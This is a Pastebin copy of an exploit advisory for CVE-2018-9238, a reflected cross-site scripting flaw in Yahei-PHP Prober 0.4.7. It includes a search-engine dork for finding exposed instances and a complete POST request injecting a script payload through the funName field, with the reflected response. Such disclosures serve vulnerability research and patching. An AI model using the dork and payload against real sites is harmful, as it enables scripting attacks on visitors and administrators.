SHARE
TWEET

CVE-2018-9238

ManhNho Apr 4th, 2018 576 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Exploit title: Yahei-PHP Proberv0.4.7 - Cross-Site Scripting
  2. # Google Dork: intitle:"Proberv0." | inurl:/proberv.php
  3. # Date: 23/03/2018
  4. # Exploit Author: ManhNho
  5. # Vendor Homepage: http://www.yahei.net/
  6. # Software Link: www.yahei.net/tz/tz_e.zip  
  7. # Version: 0.4.7
  8. # CVE: CVE-2018-9238
  9. # Category: Webapps
  10.  
  11. -----------------------------------------------------
  12. PoC
  13. -----------------------------------------------------
  14. Request:
  15.  
  16. POST /proberv.php HTTP/1.1
  17. Host: <target>
  18. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0
  19. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  20. Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
  21. Accept-Encoding: gzip, deflate
  22. Referer: <target>/proberv.php
  23. Content-Type: application/x-www-form-urlencoded
  24. Content-Length: 186
  25. Connection: close
  26. Upgrade-Insecure-Requests: 1
  27.  
  28. pInt=No+Test&pFloat=No+Test&pIo=No+Test&host=localhost&port=3306&login=&password=&funName=%27%29%3C%2Fscript%3E%3Cscript%3Ealert%28%221%22%29%3B%3C%2Fscript%3E&act=Function+Test&mailAdd=
  29.  
  30. -----------------------------------------------------
  31. Response:
  32.  
  33. HTTP/1.1 200 OK
  34. Server: nginx
  35. Date: Thu, 22 Mar 2018 16:59:57 GMT
  36. Content-Type: text/html; charset=utf-8
  37. Connection: close
  38. Vary: Accept-Encoding
  39. Content-Length: 30461
  40. ...
  41. <tr>
  42. <td width="15%"></td>
  43. <td width="60%">
  44. Enter the function you want to test:
  45. <input type="text" name="funName" size="50" />
  46. </td>
  47. <td width="25%">
  48. <input class="btn" type="submit" name="act" align="right" value="Function Test" />
  49. </td>
  50. </tr>
  51. <script>alert('Function')</script><script>alert("1");</script>Test results support the position: 错误')</script></table>
  52. -----------------------------------------------------
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top